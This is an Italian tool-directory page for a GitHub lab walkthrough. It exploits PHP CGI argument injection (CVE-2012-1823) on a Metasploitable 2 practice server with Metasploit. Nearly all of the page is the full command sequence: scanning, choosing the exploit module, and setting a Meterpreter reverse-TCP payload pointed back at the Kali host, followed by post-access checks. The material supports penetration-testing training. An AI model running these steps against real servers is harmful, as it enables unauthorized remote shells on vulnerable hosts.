Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PHP-CGI-Argument-Injection-Exploit — In questo video, tramite Kali Linux, l'exploit di PHP CGI Argument Injection (CVE-2012-1823) sul server Metasploitable 2 viene effettuato utilizzando Metasploit. | Kitploit
Strumenti/GitHubGitHub/nulltrace1336/php-cgi-argument-injection-exploit
Framework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubnulltrace1336/php-cgi-argument-injection-exploit

PHP-CGI-Argument-Injection-Exploit

In questo video, tramite Kali Linux, l'exploit di PHP CGI Argument Injection (CVE-2012-1823) sul server Metasploitable 2 viene effettuato utilizzando Metasploit.

Vedi Repository
109 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🎬 Questo video di YouTube

YouTube Video

1️⃣ Verifica del target

Trova l'IP di Metasploitable da Kali:

ip a

Ad esempio:

Kali: 192.168.56.101

Metasploitable2: 192.168.56.102

Controlliamo porta e servizio:

nmap -p 80 192.168.56.102

Puoi verificare anche nel browser:

http://192.168.56.102/

2️⃣ Avvia Metasploit

msfconsole

3️⃣ Seleziona il modulo exploit PHP CGI

search php cgi

Modulo corretto:

use exploit/multi/http/php_cgi_arg_injection

4️⃣ Configurazione dell'exploit

set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /

Selezioniamo il payload:

set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444

Verifichiamo:

show options

5️⃣ Esecuzione dell'exploit

run

oppure

exploit

Se ha successo:

Meterpreter session 1 opened

6️⃣ Verifica dell'accesso

sysinfo
whoami
Scarica lo strumento